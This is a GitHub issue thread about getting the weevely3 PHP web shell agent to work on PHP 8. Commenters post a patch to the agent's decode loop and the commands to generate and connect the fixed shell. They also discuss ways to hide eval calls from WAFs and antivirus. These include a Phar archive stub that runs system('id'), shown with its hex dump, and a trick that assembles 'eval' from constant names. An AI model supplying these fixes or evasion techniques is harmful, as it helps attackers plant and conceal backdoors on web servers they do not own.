PHP8 - The remote script execution triggers an error 500, check script and payload integrity about weevely3 HOT 11 CLOSED

To generate an agent that works with PHP 8+:

Run the generate command with the flag -obfuscator cleartext1_php to disable the agent obfuscation (this is the only place that create_function is used).

Change a line in the agent to swap curly braces to square ones:

  ...
  for($i=0;$i<$l;){
  for($j=0;($j<$c&&$i<$l);$j++,$i++)
  {
- $o.=$t{$i}^$k{$j};
+ $o.=$t[$i]^$k[$j];
  }
  }
  ...

from weevely3.

Hello @nickylivardo,

Thank's for you answer ! it succefully works !

Below, it's a step by step tutorial :

weevely generate -obfuscator cleartext1_php 123 file.php

nano file.php

  ...
  for($i=0;$i<$l;){
  for($j=0;($j<$c&&$i<$l);$j++,$i++)
  {
- $o.=$t{$i}^$k{$j};
+ $o.=$t[$i]^$k[$j];
  }
  }
  ...

weevely http://localhost/file.php 123

++

Archidote

from weevely3.

@archidote @nickylivardo, thx for the answer.
For future generations:

This problem still exists in
Weevely: 4.0.1
PHP Version: 8.2.2
System: Kali linux

from weevely3.

The obfpost_php.tpl template is pretty easy to fix, as shown above.

But I feel like there is no alternative to the now defunct create_function : the only alternative would be eval, but the purpose of this obfuscator is to hide the eval call to an eventual WAF/AV in the first place, so using this function to start the deobfuscation process seems odd, if not useless.

We cannot call it from a string (ie. $f = "ev"."al"; $f("...");) because eval is a language construct, not a function.

Does anyone have an idea to save this obfuscator from obsolescence ?

Edit: assert could have been a good candidate but it does not evaluate string arguments since 8.0.0, so it's not usable.

Edit 2: it may be possible to use a (compressed) Phar archive to mangle the eval call.
Phar support is enabled by default according to PHP documentation.
It works with allow_url_include = Off.

<?php
$a = new Phar('x.phar');
$a->startBuffering();
$a->addFromString('index.php', "<?php\neval('system(\"id\");');"); // This gets compressed
$a->setStub('<?php
include "phar://".basename(__FILE__)."/index.php";
__HALT_COMPILER();
');
$a->stopBuffering();
$a->compressFiles(Phar::GZ);

00000000: 3c3f 7068 700a 696e 636c 7564 6520 2270  <?php.include "p
00000010: 6861 723a 2f2f 222e 6261 7365 6e61 6d65  har://".basename
00000020: 285f 5f46 494c 455f 5f29 2e22 2f69 6e64  (__FILE__)."/ind
00000030: 6578 2e70 6870 223b 0a5f 5f48 414c 545f  ex.php";.__HALT_
00000040: 434f 4d50 494c 4552 2829 3b20 3f3e 0d0a  COMPILER(); ?>..
00000050: 5400 0000 0200 0000 1100 0010 0100 0000  T...............
00000060: 0000 0000 0000 0900 0000 696e 6465 782e  ..........index.
00000070: 7068 701c 0000 002e 4a84 641e 0000 0008  php.....J.d.....
00000080: e929 0db4 1100 0000 0000 0001 0000 0078  .).............x
00000090: 1c00 0000 2e4a 8464 1f00 0000 cc69 d406  .....J.d.....i..
000000a0: b411 0000 0000 0000 b3b1 2fc8 2850 482d  ........../.(PH-
000000b0: 4bcc d150 2fae 2c2e 49cd d550 ca4c 51d2  K..P/.,.I..P.LQ.
000000c0: b456 d7b4 0600 dbbc 51ff 84c6 032f 5def  .V......Q..../].
000000d0: 3317 03f4 d7e9 e879 9ebd 1a70 ca27 f0d2  3......y...p.'..
000000e0: 96b0 eb5b 0072 0202 e90d 9891 bf8f de1a  ...[.r..........
000000f0: dbfa 64d0 14a6 fb5d e8eb dd94 c21f 040f  ..d....]........
00000100: 4abf 877e 9303 0000 0047 424d 42         J..~.....GBMB

I created a PR to fix the agent and add a phar obfuscator.

from weevely3.

I got the same problem only with PHP 8th. So I think there may be several measures applied in the newest PHP version.

from weevely3.

I confirm that PHP 8 removed create_function, breaking the PHP agent.

from weevely3.

Hi there
I try it on last version of kali and php 7.3 but I still have this problem but fortunately the shell completely works fine,problem is that this error is so annoying
Why this happenes exactly ?
is there any quick fix or complete fix for this issue?

from weevely3.

I confirm that PHP 8 removed create_function, breaking the PHP agent.

call_user_func still exists and works generally the same as create_function did

on an unrelated note, the function names in the php agent can be generated dynamically while still somewhat obfuscated by building them with static values returned by php functions such as the array keys for get_defined_constants

example with eval

`<?php
// this should return 'eval' on most php versions,

$func = strtolower(array_keys(get_defined_constants())[1]);
print($func[0].$func[6].$func[9].$func[11]);
`

there are enough static values located in the same indexes returned from get_defined_constants across most php versions to extend further with other function names

from weevely3.

The purpose of create_function was to execute in-memory PHP code from a dynamic string without leaving visible eval()s in the code. From a quick glance, it does not seem is possible to do the same with call_user_func.

from weevely3.

I got the same error as you all. :/

from weevely3.

To generate an agent that works with PHP 8+:

Run the generate command with the flag -obfuscator cleartext1_php to disable the agent obfuscation (this is the only place that create_function is used).

Change a line in the agent to swap curly braces to square ones:

  ...
  for($i=0;$i<$l;){
  for($j=0;($j<$c&&$i<$l);$j++,$i++)
  {
- $o.=$t{$i}^$k{$j};
+ $o.=$t[$i]^$k[$j];
  }
  }
  ...

it works, thanks

from weevely3.